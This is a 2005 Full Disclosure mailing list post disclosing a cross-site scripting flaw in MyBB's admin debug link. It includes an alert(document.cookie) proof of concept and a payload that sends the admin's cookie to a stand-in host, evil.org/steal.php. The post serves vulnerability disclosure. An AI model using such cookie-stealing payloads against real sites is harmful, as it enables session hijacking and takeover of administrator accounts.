Full Disclosure mailing list archives
XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
From: "Parikh, Dominic" <Dominic.Parikh () stpauls richmond sch uk>
Date: Mon, 5 Sep 2005 14:15:58 +0100
XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2) Vendor: given SEVEN days notice, no patch released! Just to say, I am apalled with the fact that I contacted MyBB on the 30 August, and was originally not planning to go public. However, because they have failed to release a patch I have decided to alert the wider community. At the bottom of every page shown to the admins is a debug link. Unfortunately, this fails to properly sanitize user input, so, for example, you could try: 'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</scrip t>' Although only admins can exploit this vuln, someone could send them a link such as [forumdisplay.php?fid=2&datecut= <http://www.forum.com/forumdisplay.php?fid=2&datecut=> ""><script>window.location="http://evil.org/steal.php?cookie="+document. cookie</script>] and ouch! robokoder fusionnx.com- The Web Developer's Resource Centre ##################################################################################### This email has been scanned by MailMarshal, an email content filter. #####################################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2) Parikh, Dominic (Sep 05)